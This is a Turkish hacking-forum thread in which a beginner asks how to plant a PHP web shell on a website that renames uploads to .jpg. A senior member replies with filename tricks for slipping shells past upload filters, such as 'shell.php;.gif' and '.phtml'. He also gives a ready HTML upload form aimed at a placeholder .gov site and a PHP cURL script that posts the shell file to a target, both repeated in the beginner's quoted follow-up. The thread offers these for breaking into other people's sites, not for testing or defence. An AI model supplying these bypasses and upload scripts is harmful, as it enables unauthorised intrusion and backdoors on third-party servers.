Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: HTTP Header Live Hatası
karincayiyen
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 2
Yaşam Puanı: 32 / 40
Deneyim: 62 / 100
Rep Sayısı: 1
Mesaj Sayısı: 15
Üyelik Tarihi: 05.03.2019
     
Yorum: #1
HTTP Header Live Hatası
09.03.2019 14:33
Merhabalar, shell atmayı config çekmeyi öğrenmeye çalışıyorum. Bir siteye shellimi shell.php.jpg şeklinde yükleyebiliyorum. Ancak site onu /profile-user.jpg şeklinde kaydediyor. Adını değiştirip sadece .jpg uzantısını alıyor. HTTP Header live ile shell.php.jpg kısmını yakalayıp .jpg kısmını silip replay send dediğimde ise sitede üyegirişi yapmaya çalışıp hata döndürüyor. Buraya nasıl shell atarım?
Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,379 / 1,379
Deneyim: 18 / 100
Rep Sayısı: 2806
Mesaj Sayısı: 6415
Üyelik Tarihi: 21.08.2013
     
Yorum: #2
Cvp: HTTP Header Live Hatası
09.03.2019 20:59
Merhaba @karincayiyen

Uzun uzun yazmaya gerek yok. Bu konuda sayfalarca yazı yazılabilinir. Onuda söylemiş olalım. Ama kısaca açıklamak gerekirse ;

shell.php.jpg diye yüklersen sadece .jpg yi algılar sistem. O zaman shell çalışmaz.

shell.php.pjpg olarak yüklersen .php shell kodlarını algılar. Böyle Shell Sistemde çalışır.

shell.php;.gif shell.asp;.jpeg shell.php5 shell.phtml

Sh3LL.php.gif - Sh3LL.php;.gif - Sh3LL.asp;.jpeg

Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv

şöyle dosya uzantılarıyla denersen backdoor yüklemiş olabilirsin. Sistemi istediğin gibi evirip çevirebilirsin.

CSRF yani Cross Site Request Forgery yada bir PHP - PERL - PYHTON - RUBY dillerinde yazdığın yada yazılmış bir Exploit hazırlayıp

sistemlere shell yükleyebilirsin.

Örnek vermek gerekirse ; CSRF Exploit Kod Örneği

Buralara Zaaflı Siteyi ve Exploit URL Linkini yazacaksın. Shell yüklemek için.

Kod:
<form action="http://[BURAYA-ZAAFLI-SİTE-YAZILACAK].gov/[DOSYANIN-DİZİNİ-VARSA-BURAYA-YAZ]/[EXPLOIT-LINKINI-YAZ]" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

PHP Exploiter yazayım mesela ;

Kod:
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[HEDEFSITEYİBURAYAYAZ]/[EXPLOITI-BURAYA-YAZ]");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Ve Sonunda HTTP Live Headers ile Shell Yükleme Yöntemleri Videoları =>

























Daha fazla sayfalarca yazı makale yazılırdı ama bu kadar kısa yeter.

İşlem bu kadar. Hadi Kolay Gelsin. Cigara

# KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army #



Alinti
karincayiyen
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 2
Yaşam Puanı: 32 / 40
Deneyim: 62 / 100
Rep Sayısı:
Mesaj Sayısı: 15
Üyelik Tarihi: 05.03.2019
     
Yorum: #3
Cvp: HTTP Header Live Hatası
09.03.2019 21:52
(09.03.2019 20:59)KingSkrupellos Nickli Kullanıcıdan Alıntı:  Merhaba @karincayiyen

Uzun uzun yazmaya gerek yok. Bu konuda sayfalarca yazı yazılabilinir. Onuda söylemiş olalım. Ama kısaca açıklamak gerekirse ;

shell.php.jpg diye yüklersen sadece .jpg yi algılar sistem. O zaman shell çalışmaz.

shell.php.pjpg olarak yüklersen .php shell kodlarını algılar. Böyle Shell Sistemde çalışır.

shell.php;.gif shell.asp;.jpeg shell.php5 shell.phtml

Sh3LL.php.gif - Sh3LL.php;.gif - Sh3LL.asp;.jpeg

Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv

şöyle dosya uzantılarıyla denersen backdoor yüklemiş olabilirsin. Sistemi istediğin gibi evirip çevirebilirsin.

CSRF yani Cross Site Request Forgery yada bir PHP - PERL - PYHTON - RUBY dillerinde yazdığın yada yazılmış bir Exploit hazırlayıp

sistemlere shell yükleyebilirsin.

Örnek vermek gerekirse ; CSRF Exploit Kod Örneği

Buralara Zaaflı Siteyi ve Exploit URL Linkini yazacaksın. Shell yüklemek için.

Kod:
<form action="http://[BURAYA-ZAAFLI-SİTE-YAZILACAK].gov/[DOSYANIN-DİZİNİ-VARSA-BURAYA-YAZ]/[EXPLOIT-LINKINI-YAZ]" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

PHP Exploiter yazayım mesela ;

Kod:
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[HEDEFSITEYİBURAYAYAZ]/[EXPLOITI-BURAYA-YAZ]");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Ve Sonunda HTTP Live Headers ile Shell Yükleme Yöntemleri Videoları =>

























Daha fazla sayfalarca yazı makale yazılırdı ama bu kadar kısa yeter.

İşlem bu kadar. Hadi Kolay Gelsin. Cigara

Çok teşekkürler hocam videoları izledim ancak orada olmayan bir hata alıyorum. Http headers kullanırken siteden neden şu hata dönüyor olabilir:
"site.com/uyegiris/?islem=hata&refurl=site.com"

"shell.php;.gif" olarak yüklüyorum http headers live ile değiştirip" send" dediğimde http headers live eklentisinde görüyorum site bu isteği döndürüyor. Nerde hata yapıyorum acaba
Alinti



1 Ziyaretçi